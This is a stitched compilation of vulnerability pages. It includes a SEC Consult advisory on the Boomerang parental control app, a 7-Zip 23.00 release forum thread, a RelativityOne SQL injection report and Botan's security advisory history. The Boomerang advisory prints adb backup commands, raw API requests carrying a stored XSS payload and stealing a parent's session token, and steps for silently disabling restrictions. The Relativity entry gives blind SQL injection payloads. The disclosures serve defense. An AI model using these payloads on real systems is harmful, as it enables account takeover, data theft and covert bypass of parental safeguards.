An issue was discovered in the Boomerang Parental Control application through 13.83 for Android. The child can use Safe Mode to remove all restrictions temporarily or uninstall the application without the parents noticing.

**Full Disclosure mailing list archives****SEC Consult SA-20230628-0 :: Stored XSS & Privilege Escalation in Boomerang Parental Control App**

_From_: "SEC Consult Vulnerability Lab, Research via Fulldisclosure" <fulldisclosure () seclists org>  
_Date_: Wed, 28 Jun 2023 07:29:21 +0000  

SEC Consult Vulnerability Lab Security Advisory < 20230628-0 >
=======================================================================
               title: Stored XSS & Privilege Escalation
             product: Boomerang Parental Control App
  vulnerable version: <13.83
       fixed version: >=13.83 (only issue 1), rest not fixed
          CVE number: CVE-2023-36620, CVE-2023-36621
              impact: High
            homepage: https://nationaledtech.com
               found: 2022-09-29
                  by: Fabian Densborn (Office Vienna)
                      Bernhard Gründling (Office Vienna)
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"National Education Technologies Inc. is a manufacturer of mobile
applications. Their portfolio ranges from parental control apps, to
safe browsing apps, to digital wellbeing apps."

Source: https://nationaledtech.com

Business recommendation:
------------------------
The vendor only provides an update for one of the identified security issues,
but it effectively reduces the risk of some of the other vulnerabilities, which
are currently not fixed yet. The vendor could not provide a timeline when the
rest of the issues will be patched.
If possible, limit the possibility to boot into Android safe mode. Otherwise
children are always able to bypass any restrictions.

An in-depth security analysis performed by security professionals is
highly advised, to identify and resolve potential further critical security
issues.


Vulnerability overview/description:
-----------------------------------
1) ADB Backup allowed (CVE-2023-36620)
The app is missing the android:allowBackup="false" attribute in the
manifest which allows the user to backup the internal memory of the
app to a PC. This gives the user access to the device (in case ADB is enabled)
and API token which are used to authenticate requests to the API.

2) Stored XSS
The customizable name of the child's device can be used to trigger a XSS
payload in the parent web dashboard. Children might be able to attack
their parents' account.

3) Trigger parent control functions from child device (Privilege Escalation)
A device token in the form of a UUID is used as a session token for the parent
and the child device. The parent device token is leaked on an endpoint which
is accessible by the child, which is equivalent to leaking the session token.
This token can then be used to authenticate requests to the API and get the same
access rights as the parent. This would allow a child to bypass restrictions
and access device settings.

4) Disable Child App Restriction without Parent's notice (CVE-2023-36621)
The child can remove all restrictions temporarily or uninstall the application
without the parents noticing.


Proof of concept:
-----------------
1) ADB Backup allowed (CVE-2023-36620)
The internals of the app can be backed up to a PC by connecting the device
and running the following commands. As a prerequisite, the ADB feature
must be enabled or being used via recovery. Children could bypass any Android
setting restrictions via vulnerability 3).

--------------------------------------------------------------------------------
adb backup -apk com.nationaledtech.Boomerang
dd if=backup.ab bs=24 skip=1 | zlib-flate -uncompress | tar xf -
--------------------------------------------------------------------------------

The internal data contains the device and API token which are used to
communicate with the API.


2) Stored XSS
As the internal memory including the device and API token is backup-able (see 1),
it is possible to construct arbitrary requests to the API in the name
of the child. The following payload can be used to change the device name
and trigger an alert box in the dashboard of the parent:

--------------------------------------------------------------------------------
POST /services/DeviceService.svc/RenameDevice HTTP/1.1
Accept: application/json
Content-Type: application/json;charset=UTF-8
Content-Length: 1470
Host: app.useboomerang.com

{
     "DeviceToken": <child-device-token>,
     "ApiToken": <child-api-token>,
     "DeviceTitle":"\\"\\/><img src=\\"x\\" onerror=\\"alert(1)\\"\\/>",
     "TargetDeviceToken": <child-device-token>
}
--------------------------------------------------------------------------------


3) Access parent control functions from child device (Privilege Escalation)
When visiting the Family Messenger Tab within the application on the device, a GET
request to API endpoint \`/services/FamilyService.svc/GetAllFamilyDevices\` will be
sent and the response contains all DeviceTokens associated with the account
(including the ones of parent devices).

To be able to query the \`/services/FamilyService.svc/GetAllFamilyDevices\`
endpoint an attacker first needs to backup their device and get access to their
own device and API token. Then an attacker is able to create their own request
querying the device token of the parent.

--------------------------------------------------------------------------------
POST /services/FamilyService.svc/GetAllFamilyDevices HTTP/1.1
Accept: application/json
Content-Type: application/json;charset=UTF-8
Content-Length: 54
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 4a Build/RQ2A.210305.006)
Host: app.useboomerang.com
Connection: close
Accept-Encoding: gzip, deflate

{"DeviceToken":"<child-token>"}
--------------------------------------------------------------------------------

Response:
--------------------------------------------------------------------------------
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Connection: close
Content-Length: 450

{
        "content":null,
        "isSuccessful":true,
        "Devices":\[
                {
                        "DeviceToken":"\[parent-token\]",
                        \[...\]
                }
        \]
}
--------------------------------------------------------------------------------

With the DeviceToken of the parent, the API token can be retrieved from the
\`/services/DeviceService.svc/UpdateStatus\` endpoint:

--------------------------------------------------------------------------------
POST /services/DeviceService.svc/UpdateStatus HTTP/1.1
Host: app.useboomerang.com
Accept: application/json
Content-Type: application/json
User-Agent: Boomerang/234 CFNetwork/1240.0.4 Darwin/20.5.0
Accept-Language: en-us
Content-Length: 55
Accept-Encoding: gzip, deflate
Connection: close


{"DeviceToken": <parent-token>,}
--------------------------------------------------------------------------------

As the device token combined with the API token are used to authenticate requests
to the API, the child now has the same access rights as the parent.


4) Disable Child App Restriction without Parent's notice (CVE-2023-36621)
The child can disable the restrictions of the application without the parents
noticing. For this, the following steps are necessary:
a) Turn off Internet connectivity on the child device or block access to the
    API server (e.g. on the router).
b) Reboot into Android Safe Mode.
c) Disable Device Admin, "Display over other apps", Usage Access, Accessibility
    Permissions for the app in Android settings.
d) After rebooting in to normal mode, the child device can be used without
    restrictions. For example, previously locked apps can now be used. The parent's
    application will show that Protection is still on and the last check-in time.
    Internet must stay off on the child device during this.
e) After usage of the restricted apps is finished, the mentioned permissions are
    turned back on.
f) The device is restarted to clear any cached HTTP requests of the app that might
    inform the parent.
g) Internet is re-enabled. The parent's device will not see an indication of these
    activities on their device.

Alternatively, the Boomerang app can also be uninstalled after disabling the Device
Admin permission in step 3. Internet can then be turned on as well on the child's
device without any notification to the parent. The only way for the parent to notice
this would be to manually check the last check-in time.

The "Safe Mode Bypass" cannot be exploited on Samsung KNOX capable devices, as
special restrictions can be set in order to disable booting into safe mode.


Vulnerable / tested versions:
-----------------------------
The following version has been tested and downloaded from the Google Play store,
which was the most recent version available at the time of the initial test:
\* Android app version 13.53

Later on, version 13.61 (2022-10-25) and 13.68 (2022-12-13) have been verified to be
vulnerable as well.


Vendor contact timeline:
------------------------
2022-11-23: Contacting vendor through support () useboomerang com and
             support () nationaledtech com
2022-11-23: Response from vendor: "We got your email but can't
             understand it - maybe it was sent by accident? How can we help?"
2022-11-24: Explaining that our email was no accident and that we want
             to send our security advisory over encrypted channels to the vendor .
             No response.
2022-12-05: Notifying vendor again that we found critical security
             issues and where to send the advisory to.
             No response.
2022-12-15: Still no response, informing vendor again about the planned
             release date of 12th January, informing them that a blog post
             is planned with an overview about security issues in
             parental control apps for next week.
2022-12-15: Vendor response: "Hi. I can't understand this attachment. What
             is the issue?"
2022-12-16: Explaining "responsible disclosure" to the vendor again, asking
             where to send the advisory and that a blog post is planned, as
             well as the advisory release for 12th January.
2022-12-20: Published blog post (https://r.sec-consult.com/parents), asked
             vendor again where to send the security advisory.
2022-12-21: Vendor reply, please send advisory via email. Seems like all
             previous answers from the vendor were not properly received
             (mail server problem).
2022-12-21: Advisory was sent to vendor.
2023-01-11: Advisory was sent directly to mail addresses of vendor, not via
             support mail address. Vendor confirms receipt now.
2023-02-14: Asking for a status update; no response.
2023-02-28: Asking for a status update again, vendor answers that "some issues"
             have been fixed but they are still checking what is pending.
2023-03-02: Vendor responds that local backup vulnerability will be fixed soon,
             backend changes are reviewed, no timeline.
2023-05-09: Asking for a status update, informing vendor about security advisory
             release plan for May.
2023-05-19: Vendor: Only local backup vulnerability is fixed, backend parts
             are on the roadmap.
2023-05-22: Asking about a timeline/estimation for this roadmap to fix the backend
             vulnerabilities and which version includes the fix for issue 1).
2023-05-30: Vendor: latest version on Google Play v13.83 has ADB backup fix
2023-05-31: Sending current advisory version to vendor, setting preliminary
             release date to end of June, asking for timeline again, asking whether
             there are any issues in incorporating the fixes for the other
             vulnerabilities.
             No response.
2023-06-28: Release of security advisory.


Solution:
---------
According to the vendor, only issue 1) has been fixed in version 13.83, the other security
issues are still not fixed yet. Please contact the vendor for further information
regarding their timeline.


Workaround:
-----------
Be aware that children might be able to bypass any imposed restrictions.
If possible, disable booting into Android Safe Mode which works on Samsung Knox-
enabled smart phones.


Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Eviden business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec\_consult

EOF F. Densborn, B. Gründling / @2023
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **SEC Consult SA-20230628-0 :: Stored XSS & Privilege Escalation in Boomerang Parental Control App** _SEC Consult Vulnerability Lab, Research via Fulldisclosure (Jul 07)_

CVE-2023-36621: Stored XSS & Privilege Escalation in Boomerang Parental Control App

7-Zip through 22.01 on Linux allows an integer underflow and code execution via a crafted 7Z archive.

*   Home
*   Browse
*   7-Zip
*   Discussion

**A free file archiver for extremely high compression**

*   Summary
*   Files
*   Reviews
*   Support
*   Wiki
*   Tickets ▾
    *   Support Requests
    *   Patches
    *   Bugs
    *   Feature Requests
*   News
*   Discussion

Menu ▾ ▴

**7-Zip 23.00**

Created: 2023-05-07

Updated: 2023-09-27

*   **7-Zip 23.00 (beta) was released.**
    
    **Download**
    
    7-Zip for 64-bit Windows x64:  
    https://7-zip.org/a/7z2300-x64.exe
    
    7-Zip for 32-bit Windows x86:  
    https://7-zip.org/a/7z2300.exe
    
    7-Zip for 64-bit Windows ARM64:  
    https://7-zip.org/a/7z2300-arm64.exe
    
    7-Zip (console version) for 64-bit Linux x86-64 (AMD64):  
    https://7-zip.org/a/7z2300-linux-x64.tar.xz
    
    7-Zip (console version) for 32-bit Linux x86:  
    https://7-zip.org/a/7z2300-linux-x86.tar.xz
    
    7-Zip (console version) for 64-bit Linux ARM64:  
    https://7-zip.org/a/7z2300-linux-arm64.tar.xz
    
    7-Zip (console version) for 64-bit Linux ARM:  
    https://7-zip.org/a/7z2300-linux-arm.tar.xz
    
    7-Zip (console version) for macOS (ARM64 and x86-64):  
    https://7-zip.org/a/7z2300-mac.tar.xz
    
    7-Zip Extra: standalone console version, 7z DLL, Plugin for Far Manager:  
    https://www.7-zip.org/a/7z2300-extra.7z
    
    **What's new after 7-Zip 22.01:**
    
    *   7-Zip now can use new ARM64 filter for compression to 7z and xz archives. ARM64 filter can increase compression ratio for data containing executable files compiled for ARM64 (AArch64) architecture.  
        Also 7-Zip now parses executable files (that have exe and dll filename extensions) before compressing, and it selects appropriate filter for each parsed file:
        *   BCJ or BCJ2 filter for x86 executable files,
        *   ARM64 filter for ARM64 executable files.  
            Previous versions by default used x86 filter BCJ or BCJ2 for all exe/dll files.
    *   Default section size for BCJ2 filter was changed from 64 MiB to 240 MiB. It can increase compression ratio for executable files larger than 64 MiB.
    *   UDF: support was improved.
    *   cpio: support for hard links.
    *   Some changes and optimizations in WIM creation code.
    *   When new 7-Zip creates multivolume archive, 7-Zip keeps in open state only volumes that still can be changed. Previous versions kept all volumes in open state until the end of the archive creation.
    *   7-Zip for Linux and macOS now can reduce the number of simultaneously open files, when 7-Zip opens, extracts or creates multivolume archive. It allows to avoid the failures for cases with big number of volumes, bacause there is a limitation for number of open files allowed for a single program in Linux and macOS.
    *   There are optimizations in code for 7-Zip's context menu in Explorer: the speed of preparing of the menu showing was improved for cases when big number of files were selected by external program for context menu that contains 7-Zip menu commands.
    *   There are changes in code for the drag-and-drop operations to and from 7-Zip File Manager.  
        And the drag-and-drop operation with right button of mouse now is supported for some cases.
    *   The bugs were fixed:
        *   ZIP archives: if multithreaded zip compression was performed with more than one file to stdout stream (-so switch), 7-zip didn't write "data descriptor" for some files.
        *   ext4 archives: 7-Zip couldn't correctly extract symbolic link to directory from ext4 archives.
        *   HFS and APFS archives: 7-Zip incorrectly decoded uncompressed blocks (64 KiB) in compressed forks.
        *   Some another bugs were fixed.
    
    Source code will be available later.
    
    There are internal changes in source code across the whole code. So some new bugs are possible in this new version. That is why this version is marked as "beta" in this forum message.  
    If you see new bugs and problems that have appeared in this 23.00 version, please write about it in this forum thread.
    
     
    
    Last edit: Igor Pavlov 2023-05-07
    

*   Thanks, Igor, I can't wait to test drive the new version.😃
    

*    
    
    Last edit: AlexS 2023-05-07
    
    *   -myx was changed.  
        7-Zip in default -myx5 mode now parses exe and dll files to select arm64 or x86 filter.  
        Also 7-Zip can select ia64 (Itanium) and armt (ARM-Thumb) filters. But these Itanium and ARM-Thumb exe and dll files now are rare cases.
        
         
        
        Last edit: Igor Pavlov 2023-05-07
        

*   Since the 7zz executable in the macOS archive above will only extract files correctly on versions of macOS that have a utimensat() system call, it would be better to describe that archive more precisely:
    
    7-Zip (console version) for macOS **10.13 or newer** (ARM64 and x86-64):  
    https://7-zip.org/a/7z2300-mac.tar.xz
    
    On versions of macOS before 10.13, only the first file of an archive is extracted, and 7zz dies when trying to set the first extracted file’s timestamp with the missing utimensat() system call.
    
     
    
    Last edit: Christian Carey 2023-05-08
    

*   Here is updated English (United Kingdom) language.
    

*   Hi, i updated my previous translation of brazilian portuguese for 23.00's release.
    

*   Great!
    
    Would be possible, for the next beta, to have an option to list supported archive files first, such as WinRar does?
    

*   Thx for the new update, Igor.
    

*   Wow, one more update with the same boring interface from 25 years ago 🥱 Thanks for reminding us of Windows 98 when we open 7zip 😮‍💨
    
    *   give him a break, he is a one man operation, as far as I know.
        
    *   Funny, I was just thinking, wow, 24 years, and still creating amazing compression software, for free. The dedication is amazing. The interface is adequate for purpose. I use console version a lot as well as GUI, on Linux, Android (Termux), WSL, Windows. Everywhere I need (de)compression, automation, etc., 7-Zip is there for me, and I am grateful. If the GUI bothers you so much, get the source, modify it, share with others. Next time, try to write code for 24 years rather than complain for 24 years.
        
    *   What a dumb comment, you get 7-Zip for free and post crap like this? Why don't you just choose an alternative instead of spreading negative rubbish?
        
         
        
        Last edit: str() 2023-05-09
        
    *   but that interface is good (Extract Here and Extract To "name\" are separate options)
        

*    
    
    Last edit: HITCHER 2023-05-10
    

*   Hello Igor,
    
    I don't know if the topic has ever been discussed before. But is there any chance that 7zip will open and decompress lzip archives? I will be very grateful for your answer.
    
    Best regards  
    WT
    
    *   no plans for lzip support now.
        
        *   Thank you for the information.
            
            Best regards,  
            WT
            
    *   Hi, Witold,
        
        other developers have created their own adaptations of 7-Zip to add the ability to decompress lzip archives:
        
        *   https://github.com/mcmilk/7-Zip-zstd — 7-Zip ZS 22.01 (the full installation, not the Zstandard codec plugin), only for Windows;
        *   https://download.savannah.gnu.org/releases/lzip/7zip/ — a set of source code patches for 7-Zip 16.04, which if you’re comfortable with compiling your own software, could be adapted to patching newer source code versions of 7-Zip. (That’s what the 7-Zip ZS developers have done.)
        
        I haven’t tried either adaptation above. If you don’t use Windows and you’re not comfortable with compiling your own software, then continuing to use a standalone lzip program could be the simplest option.
        
        *   Thank you for your tip, Christian. I have tried the ZS edition. It suits me very well :-) It works very nicely under Windows desktop.
            
            Best regards,  
            WT
            

*   

*   On the About 7-Zip dialog, the version says 23.00, but it doesn't say 23.00 beta.
    
    *   "beta" marker of 23.00 is mentioned only here at forum.  
        So it's just additional warning for user before dowloading.  
        It can show to potential user that the code is new, and it's not so robust is final "non-beta" releases.  
        Next version of 7-Zip will be "23.01" or "23.01 beta".  
        There will be no any another "non-beta" 23.00.
        

*   Thanks for a great tool with a clean and easy interface!  
    One tiny wish: the cmd 7za version with the -stl switch: 'set archive timestamp from the most recently modified file' uses a folder stamp, if the folder is more recent than the most recent file stamp. Not a big thing but sometimes it is very useful to get the most recent modified file stamp instead as originally intended.  
    Please keep up the good work.
    
    *   -xtd switch can exclude directory metadata records from processing, if you don't need them by some reason.
        

Log in to post a comment.

CVE-2023-31102: 7-Zip / Discussion / Open Discussion: 7-Zip 23.00

SQL Injection vulnerability in Relativity ODA LLC RelativityOne v.12.1.537.3 Patch 2 and earlier allows a remote attacker to execute arbitrary code via the name parameter.

SQL Injection vulnerability in Relativity ODA LLC RelativityOne v.12.1.537.3 Patch 2 and earlier allows a remote attacker to execute arbitrary code via the name parameter.

\[Vulnerability Type\] SQL Injection

\[Vendor of Product\] Relativity ODA LLC

\[Affected Product Code Base\] RelativityOne - 12.1.537.3 Patch 2 and earlier

\[Affected Component\] POST /Relativity.Rest/API/Relativity.Users/workspace//users/retrieveusersby

\[Attack Type\] Remote

\[Impact Code execution\] true

\[Attack Vectors\] Within the JSON POST parameter 'Name', the following payload will return true and display a list of names and emails:

(SELECT (CASE WHEN (1=1) THEN 03586 ELSE 3\*(SELECT 2 UNION ALL SELECT 1) END))

But the following payload will return false and display the message 'SQL Statement Failed':

(SELECT (CASE WHEN (1=2) THEN 03586 ELSE 3\*(SELECT 2 UNION ALL SELECT 1) END))

Note: the True/False comparison takes place within the CASE WHEN () clause.

\[Reference\] https://www.linkedin.com/in/jakedmurphy1/

\[Has vendor confirmed or acknowledged the vulnerability?\] true

\[Discoverer\] Jake Murphy

CVE-2023-46954: GitHub - jakedmurphy1/CVE-2023-46954

bcrypt password hashing in Botan before 2.1.0 does not correctly handle passwords with a length between 57 and 72 characters, which makes it easier for attackers to determine the cleartext password.

If you think you have found a security bug in Botan please contact Jack Lloyd (jack@randombit.net). If you would like to encrypt your mail please use:

pub   rsa3072/57123B60 2015-03-23
      Key fingerprint = 4E60 C735 51AF 2188 DF0A  5A62 78E9 8043 5712 3B60
      uid         Jack Lloyd <jack@randombit.net>

This key can be found in the file doc/pgpkey.txt or online at https://keybase.io/jacklloyd and on most PGP keyservers.

**2022¶**

*   2022-11-16: Failure to correctly check OCSP responder embedded certificate
    
    OCSP responses for some end entity are either signed by the issuing CA certificate of the PKI, or an OCSP responder certificate that the PKI authorized to sign responses in their name. In the latter case, the responder certificate (and its validation path certificate) may be embedded into the OCSP response and clients must verify that such certificates are indeed authorized by the CA when validating OCSP responses.
    
    The OCSP implementation failed to verify that an authorized responder certificate embedded in an OCSP response is authorized by the issuing CA. As a result, any valid signature by an embedded certificate passed the check and was allowed to make claims about the revocation status of certificates of any CA.
    
    Attackers that are in a position to spoof OCSP responses for a client could therefore render legitimate certificates of a 3rd party CA as revoked or even use a compromised (and actually revoked) certificate by spoofing an OCSP-“OK” response. E.g. an attacker could exploit this to impersonate a legitimate TLS server using a compromised certificate of that host and get around the revocation check using OCSP stapling.
    
    Introduced in 1.11.34, fixed in 2.19.3
    

**2020¶**

*   2020-12-21 (CVE-2021-24115): Codec encoding/decoding was not constant time
    
    The base64, base32, base58 and hex encoding/decoding routines used lookup tables which could leak information via a cache-based side channel attack. The encoding tables were small and unlikely to be exploitable, but the decoding tables were large enough to cause non-negligible information leakage. In particular parsing an unencrypted PEM-encoded private key within an SGX enclave could be easily attacked to leak key material.
    
    Identified and reported by Jan Wichelmann, Thomas Eisenbarth, Sebastian Berndt, and Florian Sieck.
    
    Fixed in 2.17.3
    
*   2020-07-05: Failure to enforce name constraints on alternative names
    
    The path validation algorithm enforced name constraints on the primary DN included in the certificate but failed to do so against alternative DNs which may be included in the subject alternative name. This would allow a corrupted sub-CA which was constrained by a name constraints extension in its own certificate to issue a certificate containing a prohibited DN. Until 2.15.0, there was no API to access these alternative name DNs so it is unlikely that any application would make incorrect access control decisions on the basis of the incorrect DN. Reported by Mario Korth of Ruhr-Universität Bochum.
    
    Introduced in 1.11.29, fixed in 2.15.0
    
*   2020-03-24: Side channel during CBC padding
    
    The CBC padding operations were not constant time and as a result would leak the length of the plaintext values which were being padded to an attacker running a side channel attack via shared resources such as cache or branch predictor. No information about the contents was leaked, but the length alone might be used to make inferences about the contents. This issue affects TLS CBC ciphersuites as well as CBC encryption using PKCS7 or other similar padding mechanisms. In all cases, the unpadding operations were already constant time and are not affected. Reported by Maximilian Blochberger of Universität Hamburg.
    
    Fixed in 2.14.0, all prior versions affected.
    

**2018¶**

*   2018-12-17 (CVE-2018-20187): Side channel during ECC key generation
    
    A timing side channel during ECC key generation could leak information about the high bits of the secret scalar. Such information allows an attacker to perform a brute force attack on the key somewhat more efficiently than they would otherwise. Found by Ján Jančár using ECTester.
    
    Introduced in 1.11.20, fixed in 2.8.0.
    
*   2018-06-13 (CVE-2018-12435): ECDSA side channel
    
    A side channel in the ECDSA signature operation could allow a local attacker to recover the secret key. Found by Keegan Ryan of NCC Group.
    
    Bug introduced in 2.5.0, fixed in 2.7.0. The 1.10 branch is not affected.
    
*   2018-04-10 (CVE-2018-9860): Memory overread in TLS CBC decryption
    
    An off by one error in TLS CBC decryption meant that for a particular malformed ciphertext, the receiver would miscompute a length field and HMAC exactly 64K bytes of data following the record buffer as if it was part of the message. This cannot be used to leak information since the MAC comparison will subsequently fail and the connection will be closed. However it might be used for denial of service. Found by OSS-Fuzz.
    
    Bug introduced in 1.11.32, fixed in 2.6.0
    
*   2018-03-29 (CVE-2018-9127): Invalid wildcard match
    
    RFC 6125 wildcard matching was incorrectly implemented, so that a wildcard certificate such as b*.domain.com would match any hosts *b*.domain.com instead of just server names beginning with b. The host and certificate would still have to be in the same domain name. Reported by Fabian Weißberg of Rohde and Schwarz Cybersecurity.
    
    Bug introduced in 2.2.0, fixed in 2.5.0
    

**2017¶**

*   2017-10-02 (CVE-2017-14737): Potential side channel using cache information
    
    In the Montgomery exponentiation code, a table of precomputed values is used. An attacker able to analyze which cache lines were accessed (perhaps via an active attack such as Prime+Probe) could recover information about the exponent. Identified in “CacheD: Identifying Cache-Based Timing Channels in Production Software” by Wang, Wang, Liu, Zhang, and Wu (Usenix Security 2017).
    
    Fixed in 1.10.17 and 2.3.0, all prior versions affected.
    
*   2017-07-16: Failure to fully zeroize memory before free
    
    The secure\_allocator type attempts to zeroize memory before freeing it. Due to a error sometimes only a portion of the memory would be zeroed, because of a confusion between the number of elements vs the number of bytes that those elements use. So byte vectors would always be fully zeroed (since the two notions result in the same value), but for example with an array of 32-bit integers, only the first 1/4 of the elements would be zeroed before being deallocated. This may result in information leakage, if an attacker can access memory on the heap. Reported by Roman Pozlevich.
    
    Bug introduced in 1.11.10, fixed in 2.2.0
    
*   2017-04-04 (CVE-2017-2801): Incorrect comparison in X.509 DN strings
    
    Botan’s implementation of X.509 name comparisons had a flaw which could result in an out of bound memory read while processing a specially formed DN. This could potentially be exploited for information disclosure or denial of service, or result in incorrect validation results. Found independently by Aleksandar Nikolic of Cisco Talos, and OSS-Fuzz automated fuzzing infrastructure.
    
    Bug introduced in 1.6.0 or earlier, fixed in 2.1.0 and 1.10.16
    
*   2017-03-23 (CVE-2017-7252): Incorrect bcrypt computation
    
    Botan’s implementation of bcrypt password hashing scheme truncated long passwords at 56 characters, instead of at bcrypt’s standard 72 characters limit. Passwords with lengths between these two bounds could be cracked more easily than should be the case due to the final password bytes being ignored. Found and reported by Solar Designer.
    
    Bug introduced in 1.11.0, fixed in 2.1.0.
    

**2016¶**

*   2016-11-27 (CVE-2016-9132) Integer overflow in BER decoder
    
    While decoding BER length fields, an integer overflow could occur. This could occur while parsing untrusted inputs such as X.509 certificates. The overflow does not seem to lead to any obviously exploitable condition, but exploitation cannot be positively ruled out. Only 32-bit platforms are likely affected; to cause an overflow on 64-bit the parsed data would have to be many gigabytes. Bug found by Falko Strenzke, cryptosource GmbH.
    
    Fixed in 1.10.14 and 1.11.34, all prior versions affected.
    
*   2016-10-26 (CVE-2016-8871) OAEP side channel
    
    A side channel in OAEP decoding could be used to distinguish RSA ciphertexts that did or did not have a leading 0 byte. For an attacker capable of precisely measuring the time taken for OAEP decoding, this could be used as an oracle allowing decryption of arbitrary RSA ciphertexts. Remote exploitation seems difficult as OAEP decoding is always paired with RSA decryption, which takes substantially more (and variable) time, and so will tend to mask the timing channel. This attack does seems well within reach of a local attacker capable of a cache or branch predictor based side channel attack. Finding, analysis, and patch by Juraj Somorovsky.
    
    Introduced in 1.11.29, fixed in 1.11.33
    
*   2016-08-30 (CVE-2016-6878) Undefined behavior in Curve25519
    
    On systems without a native 128-bit integer type, the Curve25519 code invoked undefined behavior. This was known to produce incorrect results on 32-bit ARM when compiled by Clang.
    
    Introduced in 1.11.12, fixed in 1.11.31
    
*   2016-08-30 (CVE-2016-6879) Bad result from X509\_Certificate::allowed\_usage
    
    If allowed\_usage was called with more than one Key\_Usage set in the enum value, the function would return true if _any_ of the allowed usages were set, instead of if _all_ of the allowed usages are set. This could be used to bypass an application key usage check. Credit to Daniel Neus of Rohde & Schwarz Cybersecurity for finding this issue.
    
    Introduced in 1.11.0, fixed in 1.11.31
    
*   2016-03-17 (CVE-2016-2849): ECDSA side channel
    
    ECDSA (and DSA) signature algorithms perform a modular inverse on the signature nonce k. The modular inverse algorithm used had input dependent loops, and it is possible a side channel attack could recover sufficient information about the nonce to eventually recover the ECDSA secret key. Found by Sean Devlin.
    
    Introduced in 1.7.15, fixed in 1.10.13 and 1.11.29
    
*   2016-03-17 (CVE-2016-2850): Failure to enforce TLS policy
    
    TLS v1.2 allows negotiating which signature algorithms and hash functions each side is willing to accept. However received signatures were not actually checked against the specified policy. This had the effect of allowing a server to use an MD5 or SHA-1 signature, even though the default policy prohibits it. The same issue affected client cert authentication.
    
    The TLS client also failed to verify that the ECC curve the server chose to use was one which was acceptable by the client policy.
    
    Introduced in 1.11.0, fixed in 1.11.29
    
*   2016-02-01 (CVE-2016-2196): Overwrite in P-521 reduction
    
    The P-521 reduction function would overwrite zero to one word following the allocated block. This could potentially result in remote code execution or a crash. Found with AFL
    
    Introduced in 1.11.10, fixed in 1.11.27
    
*   2016-02-01 (CVE-2016-2195): Heap overflow on invalid ECC point
    
    The PointGFp constructor did not check that the affine coordinate arguments were less than the prime, but then in curve multiplication assumed that both arguments if multiplied would fit into an integer twice the size of the prime.
    
    The bigint\_mul and bigint\_sqr functions received the size of the output buffer, but only used it to dispatch to a faster algorithm in cases where there was sufficient output space to call an unrolled multiplication function.
    
    The result is a heap overflow accessible via ECC point decoding, which accepted untrusted inputs. This is likely exploitable for remote code execution.
    
    On systems which use the mlock pool allocator, it would allow an attacker to overwrite memory held in secure\_vector objects. After this point the write will hit the guard page at the end of the mmap’ed region so it probably could not be used for code execution directly, but would allow overwriting adjacent key material.
    
    Found by Alex Gaynor fuzzing with AFL
    
    Introduced in 1.9.18, fixed in 1.11.27 and 1.10.11
    
*   2016-02-01 (CVE-2016-2194): Infinite loop in modular square root algorithm
    
    The ressol function implements the Tonelli-Shanks algorithm for finding square roots could be sent into a nearly infinite loop due to a misplaced conditional check. This could occur if a composite modulus is provided, as this algorithm is only defined for primes. This function is exposed to attacker controlled input via the OS2ECP function during ECC point decompression. Found by AFL
    
    Introduced in 1.7.15, fixed in 1.11.27 and 1.10.11
    

**2015¶**

*   2015-11-04: TLS certificate authentication bypass
    
    When the bugs affecting X.509 path validation were fixed in 1.11.22, a check in Credentials\_Manager::verify\_certificate\_chain was accidentally removed which caused path validation failures not to be signaled to the TLS layer. So for affected versions, certificate authentication in TLS is bypassed. As a workaround, applications can override the call and implement the correct check. Reported by Florent Le Coz in GH #324
    
    Introduced in 1.11.22, fixed in 1.11.24
    
*   2015-10-26 (CVE-2015-7824): Padding oracle attack on TLS
    
    A padding oracle attack was possible against TLS CBC ciphersuites because if a certain length check on the packet fields failed, a different alert type than one used for message authentication failure would be returned to the sender. This check triggering would leak information about the value of the padding bytes and could be used to perform iterative decryption.
    
    As with most such oracle attacks, the danger depends on the underlying protocol - HTTP servers are particularly vulnerable. The current analysis suggests that to exploit it an attacker would first have to guess several bytes of plaintext, but again this is quite possible in many situations including HTTP.
    
    Found in a review by Sirrix AG and 3curity GmbH.
    
    Introduced in 1.11.0, fixed in 1.11.22
    
*   2015-10-26 (CVE-2015-7825): Infinite loop during certificate path validation
    
    When evaluating a certificate path, if a loop in the certificate chain was encountered (for instance where C1 certifies C2, which certifies C1) an infinite loop would occur eventually resulting in memory exhaustion. Found in a review by Sirrix AG and 3curity GmbH.
    
    Introduced in 1.11.6, fixed in 1.11.22
    
*   2015-10-26 (CVE-2015-7826): Acceptance of invalid certificate names
    
    RFC 6125 specifies how to match a X.509v3 certificate against a DNS name for application usage.
    
    Otherwise valid certificates using wildcards would be accepted as matching certain hostnames that should they should not according to RFC 6125. For example a certificate issued for *.example.com should match foo.example.com but not example.com or bar.foo.example.com. Previously Botan would accept such a certificate as also valid for bar.foo.example.com.
